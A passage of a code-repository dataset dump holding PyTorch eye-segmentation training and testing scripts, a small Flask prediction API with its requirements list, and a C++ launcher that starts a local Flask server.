0])])\n\n y_above = contours[0][line_above_index, :, 1].flatten()\n pk_above, _ = signal.find_peaks(y_above, width=img_filled.shape[1] * 1 / 40)\n # if img_name == '000000347521':\n # print('***', img_name)\n # print(len(pk_above))\n if len(pk_above) > 0:\n print(img_name)\n x_above = contours[0][line_above_index, :, 0].flatten()\n\n vs = ConvexHull(np.asarray([x_above, y_above]).transpose()).vertices\n indices_of_upper_hull_verts = list(\n reversed(np.concatenate([vs[np.where(vs == len(x_above) - 1)[0][0]:], vs[0:1]])))\n newX = x_above[indices_of_upper_hull_verts]\n newY = y_above[indices_of_upper_hull_verts]\n x_smooth = np.arange(newX.max(), newX.min(), -1)\n f = interp1d(newX, newY, kind='quadratic')\n y_smooth = f(x_smooth)\n\n above_refined = np.vstack([contours[0][line_below_index, :, :],\n np.vstack([x_smooth, y_smooth]).T.reshape(-1, 1, 2).astype(np.int64)])\n\n above_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.drawContours(above_mask, [above_refined], -1, 255, -1)\n ipf = np.logical_and(above_mask, ~(img_filled > 0))\n img_filled[ipf] = value + 1\n\n rf = ipf\n\n elif ipf is not None:\n print(img_name)\n _, ip_cnt, _ = cv2.findContours((img_filled > value).astype(np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n if len(ip_cnt) > 0:\n (xc, yc), rc = cv2.minEnclosingCircle(ip_cnt[0])\n ip_mask = np.zeros(img_filled.shape, dtype=np.uint8)\n cv2.circle(ip_mask, (int(xc), int(yc)), int(rc), 255, -1)\n\n img_filled[np.logical_and(ip_mask > 0, ipf)] = value + 1\n\n img_filled = fill_holes(img_filled, lambda x: x > value)\n rf = img_filled > value\n\n return img_filled, rf\n\n img_filled_sclera, ripf = re_label(img, value=0, ipf=None)\n img_sclera = img.copy()\n img_sclera[img_filled_sclera == 0] = 0 # Largest region, consider as eye\n\n img_filled_iris, rpf = re_label(img_sclera, value=1, ipf=ripf)\n img_iris = img_sclera.copy()\n img_iris[img_filled_iris == 0] = 0\n\n img_filled_pupil, _ = re_label(img_iris, value=2, ipf=rpf)\n img_pupil = img_sclera.copy()\n img_pupil[img_filled_pupil] = 0\n\n img_ret = np.zeros(img.shape, dtype=np.uint8)\n img_ret[img_filled_sclera > 0] = 1\n img_ret[img_filled_iris > 0] = 2\n img_ret[img_filled_pupil > 0] = 3\n\n n_part = np.unique(img_ret)\n if n_part.size < 4:\n # print(img_name)\n if 1 not in n_part:\n if 2 in n_part:\n img_ret[img_ret == 2] = 1\n if 3 in n_part:\n img_ret[img_ret == 3] = 2\n elif 3 in n_part:\n img_ret[img_ret == 3] = 1\n else:\n if 2 not in n_part:\n if 3 in n_part:\n img_ret[img_ret == 3] = 2\n\n return img_ret\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Eye Segmentation - SGD/SWA Testing')\n # parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n parser.add_argument('--batch_size', type=int, default=32, metavar='N', help='input batch size (default: 128)')\n parser.add_argument('--num_workers', type=int, default=4, metavar='N', help='number of workers (default: 4)')\n parser.add_argument('--checkpoint', type=str, default=None, required=True, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n parser.add_argument('--checkpoint_2', type=str, default=None, required=False, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n\n args = parser.parse_args()\n\n print('Loading dataset.')\n root_path = './Semantic_Segmentation_Dataset/'\n write_folder = root_path + 'test/predicts/'\n os.makedirs(write_folder, exist_ok=True)\n os.makedirs(write_folder + 'imgs/', exist_ok=True)\n with open(os.path.join(write_folder, 'command.sh'), 'w') as f:\n f.write(' '.join(sys.argv))\n f.write('\\n')\n\n cfg = dict()\n cfg['batch_size'] = 64\n\n cfg['scale'] = 0.5\n if cfg['scale'] == 0.5:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n else:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n\n train_set = OpenEDS(root_path=root_path + 'train',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n val_set = OpenEDS(root_path=root_path + 'validation',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n test_set = OpenEDS(root_path=root_path + 'test',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n loaders = {'train': torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers),\n 'val': torch.utils.data.DataLoader(val_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=False),\n 'test': torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=False)\n }\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = MobileNetV2_CS()\n model.to(device)\n\n print('Load model from {}'.format(args.checkpoint))\n checkpoint = torch.load(args.checkpoint)\n model.load_state_dict(checkpoint['state_dict'])\n\n model.eval()\n print('Val set: ', utils.eval(loaders['val'], model, utils.generalised_dice_loss_ce))\n torch.save(model.state_dict(), write_folder + 'model_state_dict.pt')\n torch.save(model, write_folder + 'model_full.pt')\n loader = loaders['test']\n # sys.exit(0)\n # tmp = np.load(write_folder + '000000337010.npy')\n # tmp_ref = eye_refinement(tmp)\n #\n # sys.exit(0)\n\n if args.checkpoint_2:\n model_2 = MobileNetV2_CS()\n model_2.to(device)\n checkpoint_2 = torch.load(args.checkpoint_2)\n model_2.load_state_dict(checkpoint_2['state_dict'])\n model_2.eval()\n print('Val set M2: ', utils.eval(loaders['val'], model_2, utils.generalised_dice_loss_ce))\n alpha = 0.75\n else:\n model_2 = None\n alpha = 0\n\n # print('Alpha value: ', model.alpha)\n for i, sample_batched in enumerate(tqdm(loader)):\n gc.collect()\n input = sample_batched['image'].to(device)\n target = sample_batched['mask'].to(device)\n\n out_probs, out_cat = model(input)\n if model_2:\n out_probs_2, _ = model_2(input)\n out_probs_avg = (1.0 - alpha) * out_probs + alpha * out_probs_2\n out_cat = torch.argmax(out_probs_avg, dim=1)\n\n img_names = sample_batched['name']\n img_mask_predict = out_cat.cpu().numpy().astype(np.uint8)\n for idx in range(img_mask_predict.shape[0]):\n cur_predict = img_mask_predict[idx, :, :]\n cur_name = img_names[idx]\n # np.save(write_folder + cur_name, cur_predict)\n # if cur_name == '000000337055':\n # print('Stop here')\n # else:\n # continue\n\n # if cur_name in ['000000337742', '000000350291', '000000353150']:\n # plt.imsave('E:/' + cur_name + '_pred.png', cur_predict)\n # cur_predict_ref = eye_refinement(cur_predict, cur_name)\n # plt.imsave('E:/' + cur_name + '_pred_ref.png', cur_predict_ref)\n # else:\n # continue\n\n fig = plt.figure()\n ax1 = fig.add_subplot(131)\n ax1.imshow(cur_predict)\n ax1.set_title('Predicted')\n\n np.save(write_folder + cur_name + '_orig', cur_predict)\n\n cur_predict_ref = eye_refinement(cur_predict, cur_name)\n np.save(write_folder + cur_name, cur_predict_ref)\n ax2 = fig.add_subplot(132)\n ax2.imshow(cur_predict_ref)\n ax2.set_title('Refine Predicted')\n\n ax3 = fig.add_subplot(133)\n ax3.imshow(input.cpu().numpy()[idx, 0, :, :], cmap='gray')\n ax3.set_title('Image')\n\n plt.savefig('{}{}{}.png'.format(write_folder, 'imgs/', cur_name))\n plt.clf()\n plt.close()\n del fig\n\n # if cur_name == '000000347521':\n # break\n #\n # if cur_name == '000000337039':\n # break\n # print('Alpha value: ', model.alpha)\n model.train()\n torchsummary.summary(model, (1, 320, 200))\n" }, { "alpha_fraction": 0.5538928508758545, "alphanum_fraction": 0.5707210302352905, "avg_line_length": 38.12083435058594, "blob_id": "c06b07a328e9d0602a9bc2d207f20288e75bf59f", "content_id": "b128257cb2c5541b13afbb093605adf65aa30c5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18778, "license_type": "no_license", "max_line_length": 120, "num_lines": 480, "path": "/src/train.py", "repo_name": "ZhiminWang96/Eye_VR_Segmentation", "src_encoding": "UTF-8", "text": "\"\"\"\nBased on the source code from these links\nhttps://github.com/timgaripov/swa\nhttps://github.com/izmailovpavel/contrib_swa_examples\n\"\"\"\n#from comet_ml import Experiment\nimport argparse\nimport datetime\nimport os\nimport random\nimport sys\nimport time\n\nimport numpy as np\nimport tabulate\nimport torch\nimport torch.nn.functional as F\nimport torchcontrib\nimport torchsummary\nfrom torch import nn\nfrom torchvision import transforms\nfrom tqdm import tqdm\n\nimport utils\nfrom utils import OpenEDS, Rescale, ToTensor, Normalize, Brightness\n\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\n\"\"\" ConvBNReLU\"\"\"\n\n\nclass ConvBNReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.ReLU6(inplace=True)\n )\n\n\n\"\"\" ConvReLU\"\"\"\n\n\nclass ConvReLU(nn.Sequential):\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvReLU, self).__init__(\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\n nn.BatchNorm2d(out_planes),\n nn.ReLU(inplace=True)\n )\n\n\n\"\"\" InvertedResidual \"\"\"\n\n\nclass InvertedResidual(nn.Module):\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\nclass Hsigmoid(nn.Module):\n def __init__(self, inplace=True):\n super(Hsigmoid, self).__init__()\n self.inplace = inplace\n\n def forward(self, x):\n return F.relu6(x + 3., inplace=self.inplace) / 6.\n\n\nclass SELayer(nn.Module):\n def __init__(self, channel, reduction=16):\n super(SELayer, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.fc = nn.Sequential(\n nn.Linear(channel, channel // reduction, bias=False),\n nn.ReLU(inplace=True),\n nn.Linear(channel // reduction, channel, bias=False),\n Hsigmoid()\n # nn.Sigmoid()\n )\n\n def forward(self, x):\n b, c, _, _ = x.size()\n y = self.avg_pool(x).view(b, c)\n y = self.fc(y).view(b, c, 1, 1)\n return x * y.expand_as(x)\n\n\nclass MobileNetV2_CS(nn.Module):\n def __init__(self, num_classes=4, out_shape=(640, 400), width_mult=1.0, inverted_residual_setting=None,\n round_nearest=8):\n \"\"\"\n MobileNet V2 CS main class\n Args:\n num_classes (int): Number of classes\n width_mult (float): Width multiplier - adjusts number of channels in each layer by this amount\n inverted_residual_setting: Network structure\n round_nearest (int): Round the number of channels in each layer to be a multiple of this number\n Set to 1 to turn off rounding\n \"\"\"\n super(MobileNetV2_CS, self).__init__()\n block = InvertedResidual\n input_channel = 32\n self.out_shape = out_shape\n if inverted_residual_setting is None:\n inverted_residual_setting = [\n # t, c, n, s\n [1, 16, 2, 1],\n [6, 24, 3, 2],\n [6, 32, 4, 2],\n ]\n\n # only check the first element, assuming user knows t,c,n,s are required\n if len(inverted_residual_setting) == 0 or len(inverted_residual_setting[0]) != 4:\n raise ValueError(\"inverted_residual_setting should be non-empty \"\n \"or a 4-element list, got {}\".format(inverted_residual_setting))\n\n # building first layer\n input_channel = _make_divisible(input_channel * width_mult, round_nearest)\n\n features = [ConvBNReLU(1, input_channel, stride=2)] # 3 for color image\n\n # building inverted residual blocks\n for t, c, n, s in inverted_residual_setting:\n output_channel = _make_divisible(c * width_mult, round_nearest)\n for i in range(n):\n stride = s if i == 0 else 1\n features.append(block(input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n\n # building last several layers\n kn_size = 3\n features.append(ConvReLU(input_channel, 64, kernel_size=kn_size))\n\n self.features = nn.Sequential(*features)\n \n # building segmentation layer\n c_segmentation = [64, num_classes]\n\n segmentation_part1 = [ConvReLU(c_segmentation[0], c_segmentation[0], kernel_size=1),\n nn.Upsample(scale_factor=4.0, mode='bilinear',\n align_corners=False)]\n\n up_part1 = [ConvReLU(c_segmentation[0], c_segmentation[1], kernel_size=1),\n nn.Upsample(scale_factor=4.0, mode='bilinear', align_corners=False),\n SELayer(channel=c_segmentation[1], reduction=4)]\n\n self.up_part1 = nn.Sequential(*up_part1)\n\n conv_up = [ConvReLU(c_segmentation[0], c_segmentation[1], kernel_size=kn_size),\n ConvReLU(c_segmentation[1], c_segmentation[1], kernel_size=kn_size),\n ConvReLU(c_segmentation[1], c_segmentation[1], kernel_size=kn_size),\n nn.Upsample(scale_factor=4.0, mode='bilinear', align_corners=False)]\n self.conv_up_part1 = nn.Sequential(*conv_up)\n\n self.segm_part1 = nn.Sequential(*segmentation_part1)\n\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n\n def forward(self, x):\n x = self.features(x)\n\n x1 = self.segm_part1(x)\n\n x1_seg = self.conv_up_part1(x1)\n\n x1_up = self.up_part1(x1)\n\n x = x1_seg + x1_up\n \n x_softmax = F.softmax(x, dim=1)\n sgm = torch.argmax(x_softmax, dim=1)\n return x_softmax, sgm\n\n\ndef weighted_CrossEntropyLoss(output, target, device, n_classes=4):\n \"\"\" Weighted Cross Entropy Loss\"\"\"\n n_pixel = target.numel()\n _, counts = torch.unique(target, return_counts=True)\n cls_weight = torch.div(n_pixel, n_classes * counts.type(torch.FloatTensor)).to(device)\n loss = F.cross_entropy(output, target, weight=cls_weight)\n\n return loss\n\n\ndef get_mean_std(data_loader, device):\n \"\"\" Get mean, std of data_loader \"\"\"\n print('Calculating mean, std ...')\n cnt = 0\n fst = torch.empty(3).to(device) # 0\n snd = torch.empty(3).to(device) # 0\n for i_batch, sample_batched in enumerate(tqdm(data_loader)):\n img_batch = sample_batched['image'].to(device)\n b, c, h, w = img_batch.shape\n nb_pixels = b * h * w\n sum_ = torch.sum(img_batch, dim=[0, 2, 3])\n sum_of_square = torch.sum(torch.pow(img_batch, 2.0), dim=[0, 2, 3])\n fst = (sum_ + cnt * fst) / (nb_pixels + cnt)\n snd = (sum_of_square + cnt * snd) / (nb_pixels + cnt)\n\n cnt += nb_pixels\n\n return fst, torch.sqrt(snd - torch.pow(fst, 2.0))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Eye Segmentation - SGD/SWA training')\n parser.add_argument('--dir', type=str, default=None, required=True, help='training directory (default: None)')\n parser.add_argument('--opt', type=str, default=None, required=True, help='Optimizer: Adam or SGD (default: None)')\n parser.add_argument('--batch_size', type=int, default=32, metavar='N', help='input batch size (default: 128)')\n parser.add_argument('--num_workers', type=int, default=4, metavar='N', help='number of workers (default: 4)')\n parser.add_argument('--resume', type=str, default=None, metavar='CKPT',\n help='checkpoint to resume training from (default: None)')\n parser.add_argument('--epochs', type=int, default=200, metavar='N', help='number of epochs to train (default: 200)')\n parser.add_argument('--save_freq', type=int, default=25, metavar='N', help='save frequency (default: 25)')\n parser.add_argument('--eval_freq', type=int, default=5, metavar='N', help='evaluation frequency (default: 5)')\n parser.add_argument('--lr_init', type=float, default=0.1, metavar='LR',\n help='initial learning rate (default: 0.01)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)')\n parser.add_argument('--wd', type=float, default=1e-4, help='weight decay (default: 1e-4)')\n parser.add_argument('--swa', action='store_true', help='swa usage flag (default: off)')\n parser.add_argument('--swa_start', type=float, default=161, metavar='N',\n help='SWA start epoch number (default: 161)')\n parser.add_argument('--swa_lr', type=float, default=0.0005, metavar='LR', help='SWA LR (default: 0.05)')\n parser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)')\n args = parser.parse_args()\n\n #experiment = Experiment(project_name='OpenEDS_MODIFIED', api_key='',\n # auto_output_logging='simple',\n # disabled=False)\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n print('Preparing directory %s' % args.dir)\n os.makedirs(args.dir, exist_ok=True)\n with open(os.path.join(args.dir, 'command.sh'), 'w') as f:\n f.write(' '.join(sys.argv))\n f.write('\\n')\n #f.write(experiment.get_key())\n f.write('\\n')\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n\n print('Loading dataset. ', str(datetime.datetime.now()))\n # root_path = './Semantic_Segmentation_Dataset/'\n if os.name == 'nt':\n root_path = 'C:/Semantic_Segmentation_Dataset/'\n else:\n root_path = './Semantic_Segmentation_Dataset/'\n\n cfg = dict()\n cfg['batch_size'] = 64\n\n cfg['scale'] = 0.5\n # Original, mean 0.4679, std 0.2699\n # Gamma correction: mean 0.3977, std 0.2307\n if cfg['scale'] == 0.5:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n else:\n mnet_v2_mean = [0.4679]\n mnet_v2_std = [0.2699]\n\n train_set = OpenEDS(root_path=root_path + 'train',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), Brightness(brightness=(0.5, 2.75)), ToTensor(),\n Normalize(mnet_v2_mean, mnet_v2_std)]))\n\n val_set = OpenEDS(root_path=root_path + 'validation',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n test_set = OpenEDS(root_path=root_path + 'test',\n transform=transforms.Compose(\n [Rescale(cfg['scale']), ToTensor(), Normalize(mnet_v2_mean, mnet_v2_std)])) #\n\n loaders = {'train': torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=True,\n num_workers=args.num_workers, pin_memory=True),\n 'val': torch.utils.data.DataLoader(val_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True),\n 'test': torch.utils.data.DataLoader(test_set, batch_size=args.batch_size, shuffle=False,\n num_workers=args.num_workers, pin_memory=True)\n }\n\n\n model = MobileNetV2_CS()\n model.to(device)\n criterion = utils.generalised_dice_loss_ce # weighted_CrossEntropyLoss\n if args.opt == 'sgd':\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr_init, momentum=args.momentum, weight_decay=args.wd)\n elif args.opt == 'adam':\n optimizer = torch.optim.Adam(model.parameters(), lr=args.lr_init, weight_decay=args.wd)\n torchsummary.summary(model, (1, 320, 200))\n\n\n def schedule(epoch):\n t = (epoch) / (args.swa_start if args.swa else args.epochs)\n lr_ratio = args.swa_lr / args.lr_init if args.swa else 0.01\n if args.lr_init > 5e-1:\n t_threshold = 0.16\n # elif args.lr_init > 1e-3:\n # t_threshold = 0.4\n else:\n t_threshold = 0.5\n if t <= t_threshold:\n factor = 1.0\n elif t <= 0.9:\n factor = 1.0 - (1.0 - lr_ratio) * (t - t_threshold) / (t_threshold - 0.1)\n if factor <= 0:\n factor = lr_ratio\n else:\n factor = lr_ratio\n return args.lr_init * factor\n\n\n if args.swa:\n print('SWA training')\n steps_per_epoch = len(loaders['train'].dataset) / args.batch_size\n steps_per_epoch = int(steps_per_epoch)\n print(\"Steps per epoch:\", steps_per_epoch)\n optimizer = torchcontrib.optim.SWA(optimizer, swa_start=args.swa_start * steps_per_epoch,\n swa_freq=steps_per_epoch, swa_lr=args.swa_lr)\n else:\n print('Original training')\n\n start_epoch = 0\n if args.resume is not None:\n print('Resume training from {}'.format(args.resume))\n checkpoint = torch.load(args.resume)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n\n columns = ['ep', 'lr', 'tr_loss', 'tr_acc', 'tr_mIOU', 'val_loss', 'val_acc', 'val_mIOU', 'time']\n if args.swa:\n columns = columns[:-1] + ['swa_val_loss', 'swa_val_acc', 'swa_val_mIOU'] + columns[-1:]\n swa_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n utils.save_checkpoint(\n args.dir,\n start_epoch,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n if args.resume is not None:\n if args.swa:\n optimizer.swap_swa_sgd()\n\n \"\"\" Training \"\"\"\n for epoch in range(start_epoch, args.epochs):\n time_ep = time.time()\n\n lr = schedule(epoch)\n\n utils.adjust_learning_rate(optimizer, lr)\n train_res = utils.train_epoch(loaders['train'], model, criterion, optimizer)\n #experiment.log_metric(\"learning_rate\", lr)\n\n # Log train_res\n #with experiment.train():\n # experiment.log_metrics(train_res, step=epoch)\n\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.epochs - 1:\n val_res = utils.eval(loaders['val'], model, criterion, viz='val_{}'.format(epoch + 1))\n # Log val_res\n #with experiment.validate():\n # experiment.log_metrics(val_res, step=epoch)\n else:\n val_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n if args.swa and (epoch + 1) >= args.swa_start:\n if epoch == 0 or epoch % args.eval_freq == args.eval_freq - 1 or epoch == args.epochs - 1:\n # Batchnorm update\n print('BatchNorm Update')\n optimizer.swap_swa_sgd()\n optimizer.bn_update(loaders['train'], model, device)\n swa_res = utils.eval(loaders['val'], model, criterion, viz='swa_val_{}'.format(epoch + 1))\n\n if (epoch + 1) % args.save_freq == 0 or epoch == args.epochs - 1:\n utils.save_checkpoint(\n args.dir,\n epoch + 1,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n optimizer.swap_swa_sgd()\n #with experiment.validate():\n swa_res_log = {'swa_loss': swa_res['loss'], 'swa_accuracy': swa_res['accuracy'],\n 'swa_mIOU': swa_res['mIOU']}\n # experiment.log_metrics(swa_res_log, step=epoch)\n else:\n swa_res = {'loss': None, 'accuracy': None, 'mIOU': None}\n\n if (epoch + 1) % args.save_freq == 0:\n if args.swa is None or (args.swa and (epoch + 1) < args.swa_start):\n utils.save_checkpoint(\n args.dir,\n epoch + 1,\n state_dict=model.state_dict(),\n optimizer=optimizer.state_dict()\n )\n\n time_ep = time.time() - time_ep\n values = [epoch + 1, lr, train_res['loss'], train_res['accuracy'], train_res['mIOU'], val_res['loss'],\n val_res['accuracy'], val_res['mIOU'], time_ep]\n if args.swa:\n values = values[:-1] + [swa_res['loss'], swa_res['accuracy'], swa_res['mIOU']] + values[-1:]\n\n table = tabulate.tabulate([values], columns, tablefmt='simple', floatfmt='10.6f')\n if epoch % 40 == 0:\n table = table.split('\\n')\n table = '\\n'.join([table[1]] + table)\n else:\n table = table.split('\\n')[2]\n print(table)\n \"\"\" End of Training \"\"\"\n\n print('End of training, ', str(datetime.datetime.now()))\n\n #experiment.end()\n" } ]
4
mhorndev/wgu-c964-backend
https://github.com/mhorndev/wgu-c964-backend
8c65cfea3477d1077a2e92e13bb5901e708f2cba
fc38da4cf9abc5dbf5e4a9b72ec00f02f9db0994
8eae9b2eba2a43b1065c795696040e98172217e4
refs/heads/master
2023-03-05T09:54:52.876085
2021-02-13T05:53:43
2021-02-13T05:53:43
337,913,269
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8611111044883728, "alphanum_fraction": 0.8611111044883728, "avg_line_length": 8.25, "blob_id": "fe79726440fef04b78ece3dc1805ad69d65af7db", "content_id": "902588d3b0fc83f455321c235af357868f9489bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 36, "license_type": "no_license", "max_line_length": 12, "num_lines": 4, "path": "/requirements.txt", "repo_name": "mhorndev/wgu-c964-backend", "src_encoding": "UTF-8", "text": "flask\npandas\nscikit-learn\nflask-cors" }, { "alpha_fraction": 0.6435786485671997, "alphanum_fraction": 0.6565656661987305, "avg_line_length": 21.354839324951172, "blob_id": "fb9c5377c7c5856a39661f4c5deb5df6c8659994", "content_id": "6058af72387a7c29420b44f9eba9d22ad9e99f0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 693, "license_type": "no_license", "max_line_length": 53, "num_lines": 31, "path": "/app.py", "repo_name": "mhorndev/wgu-c964-backend", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport os\nimport pandas\nimport pickle\n\napp = Flask(__name__)\nCORS(app)\n\nmodel = pickle.load(open('model.pkl','rb'))\n\[email protected]('/', methods=['POST'])\n\ndef post():\n # read request body\n data = request.get_json(force=True)\n\n # convert request body into a dataframe\n data.update((x, [y]) for x, y in data.items())\n dataframe = pandas.DataFrame.from_dict(data)\n\n # predictions\n prediction = model.predict(dataframe)\n \n # return data\n return jsonify(cost=int(prediction[0]))\n\nport = int(os.environ.get('PORT', 8080))\n\nif __name__ == '__main__':\n app.run(threaded=True, host='0.0.0.0', port=port)\n" } ]
2
MioHTT/projetFriendlyFruit
https://github.com/MioHTT/projetFriendlyFruit
5b0f7241a7cb45029c4b2e267ec5420792cf52ef
3545d7b76e72f85336abc39d5a716368bf7679a4
cc736375ef74b75643681373dbe9b374e04999da
refs/heads/master
2022-12-12T20:08:32.175675
2020-09-15T09:13:28
2020-09-15T09:13:28
295,366,778
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5016666650772095, "alphanum_fraction": 0.7016666531562805, "avg_line_length": 16.14285659790039, "blob_id": "8b1930ffc73d628b2b97984dbaba0c05bda8f884", "content_id": "2e8b6eb9b894b9281d5de5703b95962741f74091", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 1200, "license_type": "no_license", "max_line_length": 35, "num_lines": 70, "path": "/installation/requirements.txt", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "absl-py==0.9.0\naltgraph==0.17\nastunparse==1.6.3\ncachetools==4.1.0\ncertifi==2020.4.5.2\nchardet==3.0.4\nclick==6.6\ncycler==0.10.0\ndecorator==4.4.2\ndill==0.3.2\nFlask==0.11.1\ngast==0.3.3\ngeographiclib==1.50\ngeojson==1.3.3\ngoogle-auth==1.18.0\ngoogle-auth-oauthlib==0.4.1\ngoogle-pasta==0.2.0\ngrpcio==1.29.0\nh5py==2.10.0\nidna==2.9\nimageio==2.8.0\nimportlib-metadata==1.6.1\nitsdangerous==0.24\nJinja2==2.8\njoblib==0.15.1\nKeras-Preprocessing==1.1.2\nkiwisolver==1.2.0\nMarkdown==3.2.2\nMarkupSafe==0.23\nmatplotlib==3.2.1\nmlxtend==0.17.3\nmultiprocess==0.70.10\nnetworkx==2.4\nnumpy==1.18.5\noauthlib==3.1.0\nopencv-python==4.2.0.34\nopt-einsum==3.2.1\npackaging==20.4\npandas==1.0.4\nPillow==7.1.2\nprotobuf==3.12.2\npyasn1==0.4.8\npyasn1-modules==0.2.8\npyparsing==2.4.7\npython-dateutil==2.8.1\npytz==2020.1\nPyWavelets==1.1.1\nrequests==2.11.1\nrequests-oauthlib==1.3.0\nrsa==4.6\nscikit-image==0.17.2\nscikit-learn==0.23.1\nscipy==1.4.1\nseaborn==0.10.1\nShapely==1.7.0\nsip==5.3.0\nsix==1.15.0\nsklearn==0.0\ntensorboard==2.2.2\ntensorboard-plugin-wit==1.6.0.post3\ntensorflow==2.2.0\ntensorflow-estimator==2.2.0\ntermcolor==1.1.0\nthreadpoolctl==2.1.0\ntifffile==2020.6.3\ntoml==0.10.1\nurllib3==1.25.9\nWerkzeug==1.0.1\nwrapt==1.12.1\nzipp==3.1.0\n" }, { "alpha_fraction": 0.5652173757553101, "alphanum_fraction": 0.613043487071991, "avg_line_length": 19.909090042114258, "blob_id": "c30f9fb0bae297520c4f65a7ada2066b22b4e34d", "content_id": "b17334ec40a43c4153817b3adba84837a54cc1dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 230, "license_type": "no_license", "max_line_length": 63, "num_lines": 11, "path": "/installation/run.cpp", "repo_name": "MioHTT/projetFriendlyFruit", "src_encoding": "UTF-8", "text": "#include <iostream>\n\nint main() {\n system(\"start http://127.0.0.1:5000\");\n //installer \n system(\n \"installation\\\\venvFriendlyFruit\\\\Scripts\\\\activate.bat &&\"\n \"python flask_mapbox\\\\server.py\"\n );\n return 0;\n}\n" }, { "alpha_fraction": 0.6276929974555969, "alphanum_fraction": 0.6511788964271545, "avg_line_length": 41.413726806640625, "blob_id": "6cc4db05cd814d7c178caaba8aa24a3fcedf69f6", "content_id": 